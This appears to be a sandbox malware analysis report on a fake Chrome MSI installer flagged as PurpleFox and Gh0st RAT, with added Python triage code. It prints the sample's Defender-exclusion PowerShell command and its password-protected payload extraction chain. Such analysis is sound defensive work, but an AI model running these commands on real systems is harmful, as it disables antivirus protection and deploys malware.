Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Token: 35 N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Token: 35 N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2396 wrote to memory of 1288 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 2396 wrote to memory of 1288 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 2396 wrote to memory of 1288 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 2396 wrote to memory of 1288 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 2396 wrote to memory of 1288 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 1288 wrote to memory of 2908 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 2908 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 2908 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 1728 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 1288 wrote to memory of 1728 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 1288 wrote to memory of 1728 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 1728 wrote to memory of 1708 N/A C:\Windows\System32\cmd.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 1728 wrote to memory of 1708 N/A C:\Windows\System32\cmd.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 1728 wrote to memory of 1708 N/A C:\Windows\System32\cmd.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 1728 wrote to memory of 1708 N/A C:\Windows\System32\cmd.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 1728 wrote to memory of 620 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1728 wrote to memory of 620 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1728 wrote to memory of 620 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1728 wrote to memory of 2524 N/A C:\Windows\System32\cmd.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 1728 wrote to memory of 2524 N/A C:\Windows\System32\cmd.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 1728 wrote to memory of 2524 N/A C:\Windows\System32\cmd.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 1728 wrote to memory of 2524 N/A C:\Windows\System32\cmd.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 1288 wrote to memory of 2652 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
PID 1288 wrote to memory of 2652 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
PID 1288 wrote to memory of 2652 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
PID 1288 wrote to memory of 2652 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\ChromeSetupz.5516.25.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\DrvInst.exe

DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "000000000000005C" "0000000000000558"

C:\Windows\system32\MsiExec.exe

C:\Windows\system32\MsiExec.exe -Embedding 24DBB2A1855E59B6F8A4A032F90EAD22 M Global\MSI0000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\DriveHumbleTechnician'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min "" "C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe" x "C:\Program Files\DriveHumbleTechnician\XSMdjOpzlHEtnonzAHdFfqjsKAHetr" -o"C:\Program Files\DriveHumbleTechnician\" -p"373357|xZmCie].{GTlD" -y & ping 127.0.0.1 -n 2 & start /min "" "C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe" x "C:\Program Files\DriveHumbleTechnician\eaKqUwGXuXSKSERTyFiFfxKGAgTAir" -x!1_yrjwPObnoqyg.exe -o"C:\Program Files\DriveHumbleTechnician\" -p"91844v.Gsd9S^{PzzOfj" -y

C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe

"C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe" x "C:\Program Files\DriveHumbleTechnician\XSMdjOpzlHEtnonzAHdFfqjsKAHetr" -o"C:\Program Files\DriveHumbleTechnician\" -p"373357|xZmCie].{GTlD" -y

C:\Windows\system32\PING.EXE

ping 127.0.0.1 -n 2

C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe

"C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe" x "C:\Program Files\DriveHumbleTechnician\eaKqUwGXuXSKSERTyFiFfxKGAgTAir" -x!1_yrjwPObnoqyg.exe -o"C:\Program Files\DriveHumbleTechnician\" -p"91844v.Gsd9S^{PzzOfj" -y

C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe

"C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe" -number 121 -file file3 -mode mode3

C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe

"C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe"
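The two command lines that matter in this list are the PowerShell call that adds a Defender exclusion for the drop directory and the cmd.exe chain that unpacks two password-protected archives, with a loopback ping between them as a delay. The following is an added example, not part of the sandbox report or the sample, showing how to triage such lines automatically: it splits the cmd.exe chain, parses the extractor invocation assuming 7-Zip's `x` syntax (`-o<dir>`, `-p<password>`, `-x!<name>`, `-y`; the report does not name the tool and the binary name is random), and flags the Defender exclusion, the interpreters spawned by msiexec and the ping delay. The event records are constructed from the Processes list and the "wrote to memory of" rows above; the rule names are this example's own.

```python
"""Added example (not from the report): triage of the custom-action command lines.
Events are constructed from the report. Extractor arguments are assumed to follow
7-Zip's syntax (x, -o<dir>, -p<password>, -x!<name>, -y); the tool is not identified."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

TOKEN_RE = re.compile(r'(?:[^\s"]+|"[^"]*")+')   # quoted spans stay inside one token
PING_DELAY_RE = re.compile(r"\bping(?:\.exe)?\s+(?:127\.0\.0\.1|localhost)\s+-n\s+(\d+)", re.I)
DEFENDER_EXCL_RE = re.compile(r"Add-MpPreference\b.*?-Exclusion(Path|Process|Extension)", re.I)


@dataclass
class Extraction:
    tool: str
    archive: str
    out_dir: str = ""
    password: str = ""
    excludes: list[str] = field(default_factory=list)
    overwrite: bool = False   # -y: answer yes to every prompt


def split_chain(cmdline: str) -> list[str]:
    """Split a cmd.exe /c line on '&' outside double quotes (no ^-escape handling)."""
    parts, cur, in_quotes = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        if ch == "&" and not in_quotes:
            parts.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur).strip())
    return [p for p in parts if p]


def tokenize(cmd: str) -> list[str]:
    """Windows-style split; quotes are dropped after grouping."""
    return [t.replace('"', "") for t in TOKEN_RE.findall(cmd)]


def parse_extraction(cmd: str) -> Extraction | None:
    """Recover archive, output dir, password and exclusions from a 7-Zip-style 'x' call."""
    toks = tokenize(cmd)
    for i in range(1, len(toks) - 1):
        if toks[i] == "x" and toks[i - 1].lower().endswith(".exe"):
            ex = Extraction(tool=toks[i - 1], archive=toks[i + 1])
            for t in toks[i + 2:]:
                if t.startswith("-o"):
                    ex.out_dir = t[2:]
                elif t.startswith("-p"):
                    ex.password = t[2:]
                elif t.startswith("-x!"):
                    ex.excludes.append(t[3:])
                elif t == "-y":
                    ex.overwrite = True
            return ex
    return None


def triage(events: list[dict]) -> list[dict]:
    """Run the checks over process-creation events; rule names are this example's own."""
    findings = []
    for ev in events:
        parent = ev["parent_image"].lower().rsplit("\\", 1)[-1]
        child = ev["image"].lower().rsplit("\\", 1)[-1]
        if parent == "msiexec.exe" and child in ("powershell.exe", "pwsh.exe", "cmd.exe"):
            findings.append({"pid": ev["pid"], "rule": "msiexec_spawns_interpreter", "detail": child})
        if m := DEFENDER_EXCL_RE.search(ev["cmdline"]):
            findings.append({"pid": ev["pid"], "rule": "defender_exclusion_added", "detail": m.group(1)})
        for sub in split_chain(ev["cmdline"]):
            if m := PING_DELAY_RE.search(sub):
                findings.append({"pid": ev["pid"], "rule": "loopback_ping_delay", "detail": m.group(1) + " probes"})
            ex = parse_extraction(sub)
            if ex and ex.password:
                findings.append({"pid": ev["pid"], "rule": "password_protected_archive",
                                 "detail": f"{ex.archive} -> {ex.out_dir}", "extraction": ex})
    return findings


# Constructed from the report: pids 2908 and 1728, both children of MsiExec.exe pid 1288.
REPORT_EVENTS = [
    {"pid": 2908, "ppid": 1288, "parent_image": r"C:\Windows\system32\MsiExec.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -Command "
                "Add-MpPreference -ExclusionPath 'C:\\Program Files\\DriveHumbleTechnician'"},
    {"pid": 1728, "ppid": 1288, "parent_image": r"C:\Windows\system32\MsiExec.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c start /min "" '
                r'"C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe" x '
                r'"C:\Program Files\DriveHumbleTechnician\XSMdjOpzlHEtnonzAHdFfqjsKAHetr" '
                r'-o"C:\Program Files\DriveHumbleTechnician\" -p"373357|xZmCie].{GTlD" -y '
                r'& ping 127.0.0.1 -n 2 & start /min "" '
                r'"C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe" x '
                r'"C:\Program Files\DriveHumbleTechnician\eaKqUwGXuXSKSERTyFiFfxKGAgTAir" '
                r'-x!1_yrjwPObnoqyg.exe -o"C:\Program Files\DriveHumbleTechnician\" '
                r'-p"91844v.Gsd9S^{PzzOfj" -y'},
]

if __name__ == "__main__":
    for f in triage(REPORT_EVENTS):
        print(f["pid"], f["rule"], f["detail"])
```

The recovered passwords are the useful output: with them the two archives listed under Files (XSMdjOpzlHEtnonzAHdFfqjsKAHetr and eaKqUwGXuXSKSERTyFiFfxKGAgTAir) can be unpacked in a lab without re-running the installer. Note that the second extraction excludes 1_yrjwPObnoqyg.exe, which is consistent with the Files section listing 2_yrjwPObnoqyg.exe as the file that was actually dropped.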

Network

Country Destination Domain Proto
US 8.8.8.8:53 im.qq.com udp

Files

memory/1288-12-0x00000000004F0000-0x0000000000500000-memory.dmp

memory/2908-17-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

memory/2908-18-0x0000000001F30000-0x0000000001F38000-memory.dmp

C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe

MD5 c31c4b04558396c6fabab64dcf366534
SHA1 fa836d92edc577d6a17ded47641ba1938589b09a
SHA256 9d182f421381429fd77598feb609fefb54dcaef722ddbf5aa611b68a706c10d3
SHA512 814dcbc1d43bc037dadc2f3f67856dd790b15fc1b0c50fa74a169c8cc02cdc79d44f1f10e200ef662eee20cd6b5ca646ec4e77673e3fe3cb7dfb7649243f6e99

C:\Program Files\DriveHumbleTechnician\XSMdjOpzlHEtnonzAHdFfqjsKAHetr

MD5 4f8c76acd4909457be94c24638d582ad
SHA1 aa8c712b920ccf8c50de26f32fc1e4cc471bc8eb
SHA256 69dfc5f0598bee73b850e4b8958ad345188b99767f674f1f54dc1a68a270595f
SHA512 c7a7ca2a882446191b1a961011b59deca8849ca8ae71cde19cdced727a3a9883efe7b5c1f5a247bb39c3b19f08d7da28db102d76da1627d69613c3d6dd7dc6cf

C:\Program Files\DriveHumbleTechnician\eaKqUwGXuXSKSERTyFiFfxKGAgTAir

MD5 277d195bb1d050281da36e259c851e0c
SHA1 e5281f027d44e6da9eb041acfaaf0404db6ba1d8
SHA256 2b189cd2b037480fc4eada82dc53d2339327372c9979dba7fa7b66c8b7e11652
SHA512 d499fd7fbf37421736deb1d96011707a3709b8c59294b37afd5e50fd2664fccdc2e75258816e3c9526f45e1716a18b9ad72e94dfa555d1f44a3baadb9cbbb77b

C:\Program Files\DriveHumbleTechnician\2_yrjwPObnoqyg.exe

MD5 d9a41a6ce1809032f7e409a79766fbe6
SHA1 c011b1122fb750ce3b393fc35df623d7fb21ebaa
SHA256 0099f9e565c7bb368d24fa3e497fb6cad33463ef13a02017f8d072bfb7185520
SHA512 23d324a40aca1ecc022a42646826632d43c67496722004fe155df7d76e1175a02a3a69595606d452834ad61cbc119fa4fe8c98b7a39845b4fefaece34d4a92e1

C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe

MD5 5adff4313fbd074df44b4eb5b7893c5e
SHA1 d27388ef6cf34d40e0e7666f6381fcc5bbafa0f7
SHA256 d0c7a4390bdd6b442b96fc76f8a38f7b756ba2c16752ea259844420161865cae
SHA512 f5d639922b91878cf83d97563288a3aa4cba94db3ad5e8ac11d24ef7c44b019383a4414aeba6171b4c7bfa83ea1eafc1231cc9233e3b82b5ca7dc0b3ffacbf60

C:\Config.Msi\f76fbaf.rbs

MD5 0f42b5d9f26491d750e86c977b647358
SHA1 75e5f6ec305fac5312eed841a03b966529ac5edc
SHA256 ffea657e8eb6a528e857f80ac637ae2ac458eab5e0ea844d73ed5ae8d8e29c28
SHA512 2e3c41f3c7fddf8b9fd7cb2bb67fc8d7464e4f19bfe398dbcefa700af397550f01b8ef9eb57871b7305551cd14bf43c983fcdc0d1403c58b221988f5cfbb3433

C:\Windows\Installer\f76fbad.msi

MD5 92f66429d4ad77c68f77060cb18dcce0
SHA1 cde034910f4ad24df46f6bc7e4e6d467ac8baa31
SHA256 08734e0c77e055be3c43066f2cbcfd84537a819434d1e1f6d41c984ff7a4d865
SHA512 de04850632071600f6d1b9efaa3d4272ef4176e474ab8feb0caf029c300fb4c0d5a0d9f28a037c4b61a9ddaa9ca2fc89d82f09c414bffc9580935b05f1b59cc7

memory/2652-56-0x000000002B0E0000-0x000000002B10F000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-18 09:55

Reported

2024-11-18 09:58

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

154s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\ChromeSetupz.5516.25.msi

Signatures

Detect PurpleFox Rootkit

rootkit
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gh0st RAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gh0strat

rat gh0strat

Gh0strat family

gh0strat

PurpleFox

rootkit trojan purplefox

Purplefox family

purplefox

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\ = "Google Chrome" C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\StubPath = "\"C:\\Program Files\\Google\\Chrome\\Application\\130.0.6723.117\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level --channel=stable" C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Localized Name = "Google Chrome" C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\IsInstalled = "1" C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Version = "43,0,0,0" C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96} C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
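The rows above are the Active Setup registration written by the Chrome installer's own setup.exe, and the StubPath points at Chrome's chrmstp.exe, so this "persistence" hit belongs to the Google Chrome install the sample triggers rather than to the DriveHumbleTechnician components. What a practitioner needs from such a table is whether and when the StubPath will run. The following added example (not part of the report or of any vendor tool) parses the rows, models the logon check that Active Setup applies to each component, and flags StubPath binaries outside Program Files or Windows, which is where a registration worth worrying about usually points. The TRUSTED_ROOTS list and the per-user HKCU states are this example's assumptions.

```python
"""Added example (not from the report): what Active Setup does with the entry above.
HKLM values are parsed from the report's 'Set value' rows; HKCU state is constructed.
Logic follows the documented behaviour: at interactive logon, each HKLM Installed
Components\\{GUID} with IsInstalled != 0 runs its StubPath when HKCU lacks the key or
the HKLM Version (comma-separated numbers) is greater; HKCU then receives that Version."""
from __future__ import annotations

import re
from dataclasses import dataclass

ROW_RE = re.compile(
    r"^Set value \((?P<type>\w+)\) \\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Active Setup\\"
    r"Installed Components\\(?P<guid>\{[0-9A-Fa-f-]+\})\\(?P<name>[^\\=]*?) = (?P<rest>\".*)$", re.I)
TRUSTED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")  # assumption


@dataclass
class Component:
    guid: str
    stub_path: str = ""
    version: str = ""        # e.g. "43,0,0,0"
    is_installed: int = 1
    display_name: str = ""


def read_quoted(s: str) -> str:
    """Decode the leading backslash-escaped, double-quoted value of a report row."""
    out, i = [], 1
    while i < len(s):
        ch = s[i]
        if ch == "\\" and i + 1 < len(s):
            out.append(s[i + 1]); i += 2
            continue
        if ch == '"':
            break
        out.append(ch); i += 1
    return "".join(out)


def parse_report_rows(rows: list[str]) -> dict[str, Component]:
    """Rebuild one Component per GUID from 'Set value' rows; other rows are ignored."""
    comps: dict[str, Component] = {}
    for row in rows:
        m = ROW_RE.match(row.strip())
        if not m:
            continue
        c = comps.setdefault(m["guid"], Component(guid=m["guid"]))
        val, name = read_quoted(m["rest"]), m["name"].lower()
        if name == "stubpath":
            c.stub_path = val
        elif name == "version":
            c.version = val
        elif name == "isinstalled":
            c.is_installed = int(val)
        elif name == "":
            c.display_name = val       # the key's default value
    return comps


def parse_version(v: str) -> tuple[int, ...]:
    """'43,0,0,0' -> (43, 0, 0, 0); an absent version sorts below any real one."""
    return tuple(int(p) if p.strip().isdigit() else 0 for p in v.split(",")) if v else ()


def stub_runs_at_logon(hklm: Component, hkcu_version: str | None) -> bool:
    if hklm.is_installed == 0 or not hklm.stub_path:
        return False
    if hkcu_version is None:                  # this user never processed the component
        return True
    return parse_version(hklm.version) > parse_version(hkcu_version)


def simulate_logon(hklm: dict[str, Component], hkcu: dict[str, str]) -> list[str]:
    """Return the StubPaths that execute for this user; hkcu is updated as Windows does."""
    ran = []
    for guid, comp in hklm.items():
        if stub_runs_at_logon(comp, hkcu.get(guid)):
            ran.append(comp.stub_path)
            hkcu[guid] = comp.version
    return ran


def stub_executable(stub_path: str) -> str:
    s = stub_path.strip()
    return s[1:s.index('"', 1)] if s.startswith('"') else s.split(" ", 1)[0]


def outside_trusted_roots(stub_path: str) -> bool:
    """True when the StubPath binary lives outside Program Files / Windows."""
    return not stub_executable(stub_path).lower().startswith(TRUSTED_ROOTS)


# Rows copied from the table above (process and target columns kept as in the report).
REPORT_ROWS = r'''
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\ = "Google Chrome" C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\StubPath = "\"C:\\Program Files\\Google\\Chrome\\Application\\130.0.6723.117\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level --channel=stable" C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Localized Name = "Google Chrome" C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\IsInstalled = "1" C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Version = "43,0,0,0" C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe N/A
'''.strip().splitlines()

if __name__ == "__main__":
    comps = parse_report_rows(REPORT_ROWS)
    for c in comps.values():
        print(c.display_name, stub_executable(c.stub_path),
              "untrusted" if outside_trusted_roots(c.stub_path) else "trusted")
    print(simulate_logon(comps, {}))
```

Two things follow from the model. First, the StubPath runs once per user, at the next interactive logon of any user whose HKCU copy is missing or older, which is why Active Setup is listed under persistence even though nothing in HKLM fires by itself. Second, the entry only becomes interesting when the executable sits in a user-writable location or the Version is bumped to force a re-run, neither of which is the case for the Chrome entry in this report.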

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\O: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\V: C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
